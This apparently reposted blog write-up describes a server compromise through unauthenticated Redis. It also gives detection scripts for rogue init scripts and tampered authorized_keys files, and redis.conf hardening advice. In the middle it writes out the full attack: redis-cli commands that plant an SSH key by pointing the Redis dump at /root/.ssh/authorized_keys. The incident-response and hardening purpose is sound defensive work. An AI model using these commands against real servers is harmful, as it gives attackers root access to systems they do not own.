How a Redis instance with no authentication got the server compromised, and how it was fixed


Signs of the compromise

The server showed a lot of inexplicable activity, found by reviewing the command record with history.

The server would reboot for no apparent reason.

Key-based (passwordless) SSH login kept breaking.

apt-get reported errors.

The error log looked like this:

insserv: warning: script 'S01wipefs' missing LSB tags and overrides
insserv: warning: script 'S02acpidtd' missing LSB tags and overrides
insserv: warning: script 'S99selinux' missing LSB tags and overrides
insserv: warning: script 'S02DbSecuritySpt' missing LSB tags and overrides
insserv: warning: script 'wipefs' missing LSB tags and overrides
insserv: warning: script 'DbSecuritySpt' missing LSB tags and overrides
insserv: warning: script 'selinux' missing LSB tags and overrides
insserv: warning: script 'acpidtd' missing LSB tags and overrides
insserv: There is a loop between service plymouth and mountdevsubfs if started
insserv:  loop involving service mountdevsubfs at depth 2
insserv:  loop involving service udev at depth 1
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!
insserv: Starting selinux depends on plymouth and therefore on system facility `$all' which can not be true!

Looks perfectly normal, doesn't it? After all, selinux is a commonly used security service. But insserv is complaining precisely because these scripts (S01wipefs, S02acpidtd, S02DbSecuritySpt, S99selinux) carry none of the LSB header tags that packaged services have, which is not what a legitimately installed service looks like.

Cause of the compromise: a Redis weakness

Because Redis can be reached directly at IP:port, the port is wide open if no password is configured. By using redis-cli to change the persistence directory to .ssh and the dump filename to authorized_keys, an attacker can write their own SSH public key into the server's authorized keys and then simply SSH in. The article at https://bbs.ichunqiu.com/thread-17634-1-1.html describes this in detail. The rough sequence of the attack is recorded below:

Write the public key into a text file:

cd ~/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> hack.txt

Connect to the target's Redis with the redis client:

cat hack.txt | /usr/local/redis-2.8.3/src/./redis-cli -h 192.168.132.134 -x set crack

Look up and change the path of the Redis dump file:

CONFIG SET dir /root/.ssh
CONFIG SET dbfilename authorized_keys

Save:

save

From this point on, SSH login without a password is possible.
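Two triage checks that follow directly from the symptoms above (the insserv warnings about init scripts without LSB tags) and from the attack just described (an authorized_keys file that is really a Redis dump). This is an added example, not code from the original post or from the linked article; the init script names come from the log above, while the sample files, the placeholder binary path and the key material are constructed here so the script runs offline.

```shell
#!/bin/sh
# Added triage helpers (not from the original post). Both functions take a
# path argument, so they can be pointed at a copied /etc/init.d and ~/.ssh,
# or at the constructed samples built below.

SAMPLE_DIR=$(mktemp -d)
mkdir -p "$SAMPLE_DIR/init.d" "$SAMPLE_DIR/ssh"

# Constructed: an ordinary packaged init script, which carries LSB tags.
cat > "$SAMPLE_DIR/init.d/cron" <<'EOF'
#!/bin/sh
### BEGIN INIT INFO
# Provides:          cron
# Required-Start:    $remote_fs $syslog
# Default-Start:     2 3 4 5
### END INIT INFO
exec /usr/sbin/cron
EOF

# Constructed: a dropped-in persistence script with no LSB header. The name
# is one of those insserv warned about in the post; the path is a placeholder.
cat > "$SAMPLE_DIR/init.d/DbSecuritySpt" <<'EOF'
#!/bin/sh
/tmp/PLACEHOLDER-dropped-binary
EOF

# Constructed: what authorized_keys looks like after a Redis SAVE wrote it.
# The RDB magic "REDIS" plus binary bytes come first, then the key that was
# padded with blank lines (as in the post's hack.txt), then trailing bytes.
printf 'REDIS0006\376\372\003\004crack\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC-constructed-sample hacker@example\n\n\377' \
    > "$SAMPLE_DIR/ssh/authorized_keys"

# Print the names of init scripts that have no "### BEGIN INIT INFO" block.
# This is exactly the condition behind "missing LSB tags and overrides".
find_init_scripts_without_lsb() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if ! grep -q '^### BEGIN INIT INFO' "$f"; then
            basename "$f"
        fi
    done
}

# Print (with line numbers) every authorized_keys line that is not a comment,
# a blank line or a public key. Entries with leading options such as
# command="..." are also reported, which is fine: they deserve a look too.
# LC_ALL=C and grep -a make the binary RDB bytes show up as ordinary lines.
find_suspect_authorized_keys_lines() {
    LC_ALL=C grep -a -n -v -E \
        '^(#|$|ssh-(rsa|dss|ed25519) |ecdsa-sha2-nistp(256|384|521) |sk-)' "$1" || true
}

# Convenience wrapper: number of suspect lines, for scripting and alerting.
count_suspect_authorized_keys_lines() {
    find_suspect_authorized_keys_lines "$1" | wc -l | tr -d ' '
}

echo "init scripts without LSB tags in $SAMPLE_DIR/init.d:"
find_init_scripts_without_lsb "$SAMPLE_DIR/init.d"
echo "suspect authorized_keys lines:"
find_suspect_authorized_keys_lines "$SAMPLE_DIR/ssh/authorized_keys"
```

On a real host, run the two functions against /etc/init.d and against every authorized_keys file under /root/.ssh and /home/*/.ssh; a key file that starts with the RDB magic is a very strong indicator of exactly the write described above, and the extra init scripts are the persistence that survives a reboot.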

Closing the hole

It is actually simple: add password authentication in the Redis configuration file. After that, nothing can be done from redis-cli without supplying the password.

Alternatively, set bind in the configuration file to a fixed address so that Redis can only be reached from that address.
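The two fixes above correspond to the requirepass and bind directives in redis.conf. As an added example (not from the original post), here is the weak configuration beside the hardened one, plus a small audit function that reports which fixes a given file actually applies. The protected-mode directive (Redis 3.2 and later) and the rename-command line are extra hardening beyond what the post lists; the placeholder password and file paths are constructed.

```shell
#!/bin/sh
# Added example: weak vs hardened redis.conf, and an audit of the settings
# that decide whether the CONFIG SET / SAVE trick described above can work.

SAMPLE_DIR=$(mktemp -d)

# Constructed: a configuration like the one that made the attack possible.
cat > "$SAMPLE_DIR/weak.conf" <<'EOF'
bind 0.0.0.0
port 6379
# requirepass foobared
dir /var/lib/redis
dbfilename dump.rdb
EOF

# Constructed: the hardened configuration.
cat > "$SAMPLE_DIR/hardened.conf" <<'EOF'
bind 127.0.0.1
port 6379
protected-mode yes
requirepass CHANGE-ME-to-a-long-random-secret
dir /var/lib/redis
dbfilename dump.rdb
# Optional: stop clients from relocating the dump file at all.
rename-command CONFIG ""
EOF

# Print the first effective (non-comment) value of a directive, if any.
conf_value() {
    awk -v key="$2" '$1 == key { print $2; exit }' "$1"
}

# Print one line per weakness found; exit 0 only when there are none.
audit_redis_conf() {
    conf="$1"
    findings=0

    if [ -z "$(conf_value "$conf" requirepass)" ]; then
        echo "no requirepass: anyone who can reach the port can run CONFIG SET and SAVE"
        findings=$((findings + 1))
    fi

    case "$(conf_value "$conf" bind)" in
        ""|0.0.0.0|"*")
            echo "bind is unset or a wildcard: Redis listens on every interface"
            findings=$((findings + 1)) ;;
    esac

    if [ "$(conf_value "$conf" protected-mode)" != "yes" ]; then
        echo "protected-mode is not yes"
        findings=$((findings + 1))
    fi

    [ "$findings" -eq 0 ]
}

for c in weak hardened; do
    echo "== $c.conf"
    if audit_redis_conf "$SAMPLE_DIR/$c.conf"; then
        echo "ok"
    fi
done
```

A password alone stops the unauthenticated CONFIG SET, and binding to a loopback or internal address stops the port from being reachable at all; applying both, and restricting who can reach 6379 at the firewall, is the usual combination.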


Reposted from https://www.jianshu.com/p/b019eb9e32a4, with thanks to the author.
